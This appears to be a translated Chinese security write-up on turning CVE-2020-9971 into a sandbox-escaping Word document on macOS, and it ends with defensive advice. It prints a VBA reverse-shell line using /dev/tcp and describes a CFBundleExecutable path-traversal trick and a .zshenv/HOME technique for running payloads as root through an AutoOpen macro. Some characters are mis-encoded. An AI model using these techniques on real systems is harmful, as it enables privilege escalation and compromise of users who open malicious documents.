在本文中，研究人員展示了他們?nèi)绾卫靡寻l(fā)布的 macOS/iOS 權(quán)限提升漏洞將 Word 文檔武器化，解除應(yīng)用程序沙箱限制并獲得更高權(quán)限。

　　CVE-2020-9971 是 macOS/iOS 中的一個邏輯漏洞，可用于穩(wěn)定的提權(quán)漏洞。在這篇文章中，研究人員 （@R3dF09） 提到它也可以在最受限制的應(yīng)用沙箱中運(yùn)行，因此研究人員決定對其進(jìn)行測試并使用武器化的 Word 文檔繞過 Microsoft Office 2019（適用于 Mac）應(yīng)用沙箱。為了完成這個任務(wù)，研究人員不得不使用一些有趣的技巧來繞過 Apple 的文件隔離。

　　CVE-2020-9971位于launchd進(jìn)程中，與XPC Services機(jī)制有關(guān)。這種機(jī)制提供了進(jìn)程間通信，允許開發(fā)人員創(chuàng)建為其應(yīng)用程序執(zhí)行特定任務(wù)的服務(wù)。這通常用于將應(yīng)用程序拆分為更小的部分，從而提高可靠性和安全性。launchd是mac系統(tǒng)下通用的進(jìn)程管理器，是mac系統(tǒng)下非常重要的一個進(jìn)程，一般來說該進(jìn)程不允許直接以命令行的形式調(diào)用。只能通過其控制管理界面，launchctl來進(jìn)行控制。launchd主要功能是進(jìn)程管理。可以理解成是一個常駐在后臺的進(jìn)程，根據(jù)用戶的配置，來響應(yīng)特定的系統(tǒng)事件。launchd既可以用于系統(tǒng)級別的服務(wù)，又可以用于個人用戶級別的服務(wù)。

　　每個進(jìn)程都有自己的域，由 launchd 管理，其中包含有關(guān)進(jìn)程可用的 XPC 服務(wù)的信息。蘋果聲稱只有擁有者進(jìn)程才能修改自己的域，但該漏洞的核心漏洞是能夠?qū)⑷我?XPC 服務(wù)添加到任意進(jìn)程域中，然后觸發(fā)它在該進(jìn)程的上下文中運(yùn)行。起初，攻擊者將自制的 XPC 服務(wù)“注入”到具有 root 權(quán)限的特定進(jìn)程的域中（systemsoundserverd）。開發(fā)者還使用了 XPC 服務(wù)的一個眾所周知的功能來監(jiān)聽套接字以觸發(fā)和啟動它。

　　接下來，研究人員將描述成功將 Word 文檔武器化并繞過 Word 應(yīng)用程序沙箱的步驟。該研究是在易受 CVE-2020-9971 攻擊的 macOS 10.15.4 和當(dāng)時最新版本的 Microsoft Office 2019 上進(jìn)行的，但這無關(guān)緊要，因為該漏洞在操作系統(tǒng)端。

　　漏洞利用

　　研究人員的第一個目標(biāo)是創(chuàng)建一個獨(dú)立的命令行漏洞利用。在這個階段，研究人員認(rèn)為他們只需要刪除它并從武器化的 Word 文檔中執(zhí)行它即可，但實際情況并非如此。無論如何，研究人員用 XCode 創(chuàng)建了一個應(yīng)用程序，附帶一個簡單的 XPC 服務(wù)，它執(zhí)行以下步驟：

　　1.查找研究人員要使用的 root 特權(quán)進(jìn)程的 PID。正如研究人員已經(jīng)知道不可能在 Office 應(yīng)用沙箱中執(zhí)行 ps 一樣，研究人員改為使用 launchctl 打印系統(tǒng)的輸出，它顯示了系統(tǒng)中的進(jìn)程域。此時研究人員注意到systemoundserverd的進(jìn)程域是在啟動后延遲相當(dāng)長的時間創(chuàng)建的，所以研究人員改用launchservicesd的進(jìn)程域；

　　2.將研究人員的 XPC 服務(wù)注入到找到的 PID 的進(jìn)程域中；

　　3.通過打開 TCP 套接字觸發(fā)研究人員的 XPC 服務(wù)的啟動；

　　附帶的XPC服務(wù)只創(chuàng)建一個文件（表示成功），并配置為在指定的TCP端口上偵聽。漏洞利用和 XPC 服務(wù)都存儲在同一個應(yīng)用程序包中，但請注意研究人員有兩個不同的可執(zhí)行文件。

　　通過這個獨(dú)立的漏洞利用，研究人員能夠從普通用戶那里獲得 root 權(quán)限，現(xiàn)在是時候開始實現(xiàn)研究人員的最終目標(biāo)了——繞過沙盒。

　　繞過沙盒

　　研究人員的最終目標(biāo)是使用此漏洞將 Word 文檔武器化，以繞過應(yīng)用程序沙箱。其基礎(chǔ)是能夠從這個Word文檔中執(zhí)行shell命令，這可以通過Microsoft Office中的其他漏洞實現(xiàn)，或者更容易通過VBA宏實現(xiàn)，這讓研究人員只剩下說服用戶按下“啟用宏”的工作。更多關(guān)于針對 Mac 用戶的基于宏的攻擊請點(diǎn)此https://perception-point.io/mac-isnt-safe-how-do-you-like-them-apples/查看。對于這個概念驗證，研究人員將使用 VBA 宏。

　　在 Office 應(yīng)用沙箱的上下文中獲取 bash shell 很簡單，然后利用這些限制。研究人員所要做的就是偵聽特定端口（例如 netcat）并從 Word 文檔中執(zhí)行以下 VBA 宏：

　　MacScript（“do shell script ”“bash -I >&/dev/tcp/127.0.0.1/PORT 0>&1 &”“”）

　　此時，在沙箱中有了一個shell，研究人員試圖轉(zhuǎn)儲并執(zhí)行獨(dú)立漏洞，但它沒有奏效。經(jīng)過一些研究，研究人員發(fā)現(xiàn)他們在沙箱中創(chuàng)建的每個文件都是使用“com.apple.quarantine”屬性創(chuàng)建的，這個可以通過 xattr 實用程序觀察到。

　　隔離屬性是許多 macOS 保護(hù)的核心，最初，它僅附加到從互聯(lián)網(wǎng)下載的文件中，以執(zhí)行多項安全檢查（例如文件隔離、GateKeeper、Notarization 和 XProtect）。自從引入了沙箱之后，這個屬性又增加了一個角色——標(biāo)記從沙箱中創(chuàng)建的文件，并完全阻止它們被執(zhí)行。以下是研究人員試圖從沙箱shell中轉(zhuǎn)儲和執(zhí)行一個文件時產(chǎn)生的日志：

　　kernel: （Sandbox） Sandbox: bash（1724） deny（1） process-exec* /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test

　　kernel: （Quarantine） exec of /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test denied since it was quarantined by Microsoft Word and created without user consent, qtn-flags was 0x00000086

　　可以看到研究人員可以執(zhí)行 shell 命令，但不能轉(zhuǎn)儲和運(yùn)行他們自己的可執(zhí)行文件。對于可利用的可執(zhí)行文件，研究人員有一個簡單的替換方法：只需在ctypes包的幫助下運(yùn)行一個執(zhí)行相同步驟的python腳本。現(xiàn)在研究人員就能夠?qū)?XPC 服務(wù)注入目標(biāo)進(jìn)程域，甚至觸發(fā)它的執(zhí)行，但它沒有運(yùn)行：XPC 服務(wù)可執(zhí)行文件本身被標(biāo)記為隔離屬性。

　　現(xiàn)在是時候更深入地研究XPC服務(wù)的結(jié)構(gòu)了。從外部看，它看起來像一個擴(kuò)展名為“xpc”的單一文件，但它實際上是一個具有典型結(jié)構(gòu)的文件夾：

　　主要組件是 Info.plist 文件，它是一個描述服務(wù)的 XML 文件，以及可執(zhí)行文件本身（位于 MacOS 文件夾內(nèi)）。Info.plist 中的部分內(nèi)容如下：

　　< key >CFBundleExecutable< /key >< string >AppService< /string >

　　研究人員不能使用他們自己的可執(zhí)行文件，所以唯一的選擇是使用系統(tǒng)現(xiàn)有的可執(zhí)行文件之一。研究人員嘗試在 CFBundleExecutable 項中使用完整路徑，但是 XPC 服務(wù)根本無法加載。很明顯，macOS 會在目錄 Contents/MacOS 中查找具有此項中指定名稱的可執(zhí)行文件，也許研究人員可以使用路徑遍歷來指向現(xiàn)有的可執(zhí)行文件，并嘗試將值更改為：

　　< key >CFBundleExecutable< /key >< string >/////////usr/bin/yes< /string >

　　令研究人員驚訝的是，它奏效了！當(dāng)研究人員使用這個“假”XPC 服務(wù)執(zhí)行漏洞利用時，研究人員發(fā)現(xiàn)了一個具有 root 權(quán)限的“是”進(jìn)程，即使研究人員是從沙箱中執(zhí)行的。

　　因此，研究人員有能力以 root 權(quán)限運(yùn)行進(jìn)程，但似乎無法控制它們的參數(shù)。在團(tuán)隊內(nèi)部就這個問題進(jìn)一步咨詢后，研究人員想出了一個好辦法，他們注意到可以控制新進(jìn)程的環(huán)境變量，即運(yùn)行一個 shell 作為 XPC 服務(wù)（例如 zsh），將其 HOME 目錄更改為研究人員可以控制，并將 shell 在執(zhí)行開始時提供的文件放在那里（例如。zshenv）。

　　將它們?nèi)糠庋b在一起

　　研究人員編寫了一個 python 腳本，執(zhí)行以下步驟：

　　1.將“。zshenv”文件寫入當(dāng)前目錄，在沙箱內(nèi)，路徑為 /Users/user/Library/Containers/com.microsoft.Word/Data，其中包含研究人員希望以 root 身份執(zhí)行的載荷；

　　2.查找研究人員要使用的 root 權(quán)限進(jìn)程的 PID （launchservicesd）；

　　3.創(chuàng)建“假”XPC 服務(wù)，其中可執(zhí)行文件指向 zsh，并將 HOME 環(huán)境變量設(shè)置為當(dāng)前目錄；

　　4.將“假”XPC 服務(wù)注入到找到的 PID 的進(jìn)程域中；

　　5.通過打開 TCP 套接字觸發(fā) XPC 服務(wù)的啟動；

　　然后研究人員將該腳本封裝為 base64 格式，以便從VBA宏中執(zhí)行它，并將其插入到 AutoOpen 子例程中。具體演示過程請點(diǎn)此，其中有效載荷只在/tmp/hacked中創(chuàng)建一個文件（請注意，該文件是以 root 身份創(chuàng)建的，并且沒有隔離位）。

　　總結(jié)

　　研究人員證明了 CVE-2020-9971 可以用作沙箱逃逸漏洞，以 Word 文檔作為研究人員的 POC。在這個過程中，研究人員發(fā)現(xiàn)了一種通過 XPC 服務(wù)啟動任意可執(zhí)行文件的方法（在 CFBundleExecutable 值中進(jìn)行路徑遍歷），特別是執(zhí)行 shell 腳本（通過控制 HOME 環(huán)境變量和轉(zhuǎn)儲 .zshenv 文件的技巧）。

　　這個沙箱逃逸漏洞使研究人員能夠為 macOS 創(chuàng)建一個快速、簡單和廉價的武器化 Word 文檔，這嚴(yán)重危害了系統(tǒng)安全。

　　安全建議

　　1.避免打開陌生文檔，尤其是運(yùn)行來自未知來源或你不完全信任的發(fā)送方；

　　2.使用能夠處理此類攻擊的綜合性安全產(chǎn)品。